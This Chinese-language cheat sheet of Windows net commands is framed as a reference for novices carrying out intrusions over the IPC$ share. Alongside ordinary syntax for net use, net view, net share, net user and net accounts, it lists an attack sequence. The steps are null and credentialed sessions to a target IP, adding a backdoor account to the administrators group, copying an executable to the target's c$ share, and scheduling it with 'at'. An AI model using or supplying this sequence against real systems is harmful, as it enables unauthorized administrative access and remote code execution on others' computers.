ipc通道入侵相关命令整理

利用ipc$入侵的相关命令：
我们在入侵的时候难免遇到忘记命令的时候，现在将我所知道的一些命令总结出来提供给各位。通过这些命令可以解决很大一部分新手的问题。
00:net use
作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。
　　命令格式：
net use [devicename | *] [\\\\computername\\sharename[\\volume]] [password | *]] [/user:[domainname\\]username] [[/delete] | [/persistent:{yes | no}]]
参数介绍：
(1)键入不带参数的net use列出网络连接。
　　(2)devicename指定要连接到的资源名称或要断开的设备名称。
　　(3)\\\\computername\\sharename服务器及共享资源的名称。
　　(4)password访问共享资源的密码。
　　(5)*提示键入密码。
　　(6)/user指定进行连接的另外一个用户。
　　(7)domainname指定另一个域。
　 (8)username指定登录的用户名。
　　(9)/home将用户连接到其宿主目录。
　　(10)/delete取消指定网络连接。
　　(11)/persistent控制永久网络连接的使用。
01: net use \\\\X.X.X.X\\ipc$ \"\" /user:\"\" 建立空连接
02: net use \\\\X.X.X.X\\ipc$ \"密码\" /user:\"用户名\" 建立非空连接
03: net use \\\\X.X.X.X\\ipc$ /del 删除连接
04: net time \\\\X.X.X.X
作用：使计算机的时钟与另一台计算机或域的时间同步。
　　命令格式：net time [\\\\computername | /domain[:name]] [/set]
　　参数介绍：
　　(1)\\\\computername要检查或同步的服务器名。
　　(2)/domain[:name]指定要与其时间同步的域。
　　(3)/set使本计算机时钟与指定计算机或域的时钟同步。
05: net view \\\\X.X.X.X
　　作用：显示域列表、计算机列表或指定计算机的共享资源列表。
　　命令格式：net view [\\\\computername | /domain[:domainname]]
　 参数介绍：
(1)键入不带参数的net view显示当前域的计算机列表。
　　(2)\\\\computername 指定要查看其共享资源的计算机。
　　(3)/domain[:domainname]指定要查看其可用计算机的域。
06: net use X: \\\\X.X.X.X\\Y 将共享名为Y的共享资源映射为本地X盘
07: net use X: /del 删除映射的X盘
08: net share
作用：创建、删除或显示共享资源。
　　命令格式：net share share name=drive:path [/users:number | /unlimited] [/remark:\"text\"] 　　
参数介绍：(1)键入不带参数的net share显示本地计算机上所有共享资源的信息。 　 (2)sharename是共享资源的网络名称。
　　(3)drive:path指定共享目录的绝对路径。
(4)/users:number设置可同时访问共享资源的最大用户数。
　　(5)/unlimited不限制同时访问共享资源的用户数。
　　(6)/remark:\"text \"添加关于资源的注释，注释文字用引号引住。
09: net user
作用：添加或更改用户帐号或显示用户帐号信息。
该命令也可以写为 net users
　　命令格式：net user [username [password | *] [options]] [/domain]
　　参数介绍：(1)键入不带参数的net user查看计算机上的用户帐号列表。
　　(2)username添加、删除、更改或查看用户帐号名。
　　(3)password为用户帐号分配或更改密码。
　　(4)*提示输入密码。
　　(5)/domain在计算机主域的主域控制器中执行操作。
10: net start 作用：启动服务，或显示已启动服务的列表。
11: net pause 作用：暂停正在运行的服务。
12: net Continue 作用：重新激活挂起的服务。
13: net stop
作用：停止 Windows NT 网络服务。
　　命令格式：net stop service
　　参数介绍：
　　(1)alerter(警报)
　　(2)client service for netware(Netware 客户端服务)
　　(3)clipbook server(剪贴簿服务器)
　　(4)computer browser(计算机浏览器)
　　(5)directory replicator(目录复制器)
　　(6)ftp publishing service (ftp )(ftp 发行服务)
　　(7)lpdsvc
　　(8)net logon(网络登录)
　　(9)network dde(网络 dde)
　　(10)network dde dsdm(网络 dde dsdm)
　　(11)network monitor agent(网络监控代理)
　　(12)nt lm security support provider(NT LM 安全性支持提供)
　　(13)ole(对象链接与嵌入)
　　(14)remote access connection manager(远程访问连接管理器)
　　(15)remote access isnsap service(远程访问 isnsap 服务)
　　(16)remote access server(远程访问服务器)
　　(17)remote procedure call (rpc) locator(远程过程调用定位器)
　　(18)remote procedure call (rpc) service(远程过程调用服务)
　　(19)schedule(调度)
　　(20)server(服务器)
　　(21)simple tcp/ip services(简单 TCP/IP 服务)
　　(22)snmp
　　(23)spooler(后台打印程序)
　　(24)tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具)
　　(25)ups
　　(26)workstation(工作站)
　　(27)messenger(信使)
　　(28)dhcp client
　　(29)eventlog
14:net Statistics
　　作用：显示本地工作站或服务器服务的统计记录。
　　命令格式：net statistics [workstation | server]
　　参数介绍：(1)键入不带参数的net statistics列出其统计信息可用的运行服务。
　 (2)workstation显示本地工作站服务的统计信息。
　　(3)server显示本地服务器服务的统计信息。 　
　 例：net statistics server | more显示服务器服务的统计信息。
15:net Session ( 等同于net sessions 或net sess)
　作用：列出或断开本地计算机和与之连接的客户端的会话.
　命令格式：net session [\\\\computername] [/delete]
　参数介绍：(1)键入不带参数的net session显示所有与本地计算机的会话的信息。
(2)\\\\computername标识要列出或断开会话的计算机。
　举例说明： net session \\\\cnse8要显示计算机名为cnse8的客户端会话信息列表。

15: net user 帐号名 密码 /add 添加帐号和密码
16: net user 帐号名 /active:yes 激活帐号
17: net localgroup administrators 帐号名 /add 将该帐号加入本地admin组
18: Net Send
　　作用：向网络的其他用户、计算机或通信名发送消息。
　　命令格式：net send {name | * | /domain[:name] | /users} message
　　参数介绍：(1)name要接收发送消息的用户名、计算机名或通信名。
　 (2)*将消息发送到组中所有名称。
　　(3)/domain[:name]将消息发送到计算机域中的所有名称。
　　(4)/users将消息发送到与服务器连接的所有用户。
　　(5)message作为消息发送的文本。
　　例:(1)net send /users Welcome to cnse8.com 向所有的连接本机的用户显示 \"Welcome to cnse8.com\"
19:net Config
　 作用：显示当前运行的可配置服务，或显示并更改某项服务的设置。
　 命令格式：net config [service [options]]
参数介绍：
(1)键入不带参数的net config显示可配置服务的列表。
(2)service通过net config命令进行配置的服务(server或workstation)。
(3)options服务的特定选项。
20:net Accounts
　 作用：更新用户帐号数据库、更改密码及所有帐号的登录要求。
　 命令格式：net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]
　 参数介绍：
(1)键入不带参数的net accounts显示当前密码设置、登录时限及域信息。
(2)/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时。
(3)/minpwlen:length设置用户帐号密码的最少字符数。
(4)/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数。
(5)/minpwage:days设置用户必须保持原密码的最小天数。
(6)/uniquepw:number要求用户更改密码时，必须在经过number次后才能重复使用与 之相同的密码。
(7)/domain在当前域的主域控制器上执行该操作。
(8)/sync当用于主域控制器时，该命令使域中所有备份域控制器同步。
　　举例说明：net accounts /minpwlen:7将用户帐号密码的最少字符数设置为7。
21:copy 路径 \\ 文件名 \\IP\\共享目录名
例：copy c:\\cnse8.exe \\\\X.X.X.X\\c$ 将c盘下的cnse8.exe文件复制到对方得的c 盘内。
copy \\\\X.X.X.X\\c$\\cnse8.exe c:\\ 将远程机器上的文件cnse8.exe复制到自己
机器上。
22:at \\\\IP 时间 程序名 远程添加某个计划.